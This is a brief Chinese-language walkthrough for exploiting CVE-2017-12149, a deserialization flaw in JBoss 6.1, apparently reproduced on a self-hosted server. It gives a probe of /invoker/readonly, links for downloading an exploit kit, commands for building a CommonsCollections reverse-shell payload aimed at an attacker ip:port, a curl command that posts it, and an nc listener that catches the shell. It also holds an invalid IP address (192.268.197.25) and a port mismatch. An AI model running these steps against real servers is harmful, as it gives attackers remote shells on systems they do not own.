1.下載jboss
http://jbossas.jboss.org/downloads/
2.安裝配置,自己百度
3.修改配置,端口和ip遠程可以訪問
路徑:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml
4.啟動服務
到bin目錄下啟動run.bat
5.訪問ip+端口(8082)
6.驗證是否存在漏洞
http://ip:8082/invoker/readonly/
返回500 一般就是存在了。
7.下載利用工具
原: http://scan.javasec.cn/java/JavaDeserH2HC.zip
使用方法:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port //反彈shell的IP和端口
這個時候會生成一個ReverseShellCommonsCollectionsHashMap.ser文件,curl 這個二進制文件就可以了。
ReverseShellCommonsCollectionsHashMap.ser 打包到http://scan.javasec.cn/java/ReverseShellCommonsCollectionsHashMap.ser
curl http://192.268.197.25:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
簡化的利用工具:
http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip
8.本機機器執行nc 進行端口監聽
nc.exe -l -p 1234
9.執行利用工具
10.查看反彈
11.利用成功
參考地址:
http://www.cnblogs.com/sevck/p/7874438.html